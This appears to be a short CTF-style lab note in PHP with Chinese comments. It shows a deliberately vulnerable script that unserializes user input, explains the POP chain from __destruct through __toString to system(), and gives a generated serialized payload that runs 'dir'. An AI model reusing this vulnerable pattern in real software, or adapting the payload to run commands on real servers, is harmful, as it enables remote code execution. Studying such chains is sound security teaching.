<?php
highlight_file(__FILE__);
class A{public $s;public function __destruct(){echo "hello".$this->s;}}
class B{public $cmd;public function __toString(){system($this->cmd);return 1;}
}
unserialize($_GET['code']);

__toString()当对象被当着字符串执行的时候，自动执行

起点："hello".$this->s;

终点：system($this->cmd);

跳板："hello".$this->s;

<?php
highlight_file(__FILE__);
class A{public $s;public function __destruct(){echo "hello".$this->s;}}
class B{public $cmd;public function __toString(){system($this->cmd);return "1";}
}$a = new A();
$b = new B();
$b->cmd='dir';
$a->s=$b;echo serialize($a);
?>O:1:"A":1:{s:1:"s";O:1:"B":1:{s:3:"cmd";s:3:"dir";}}

执行结果如下：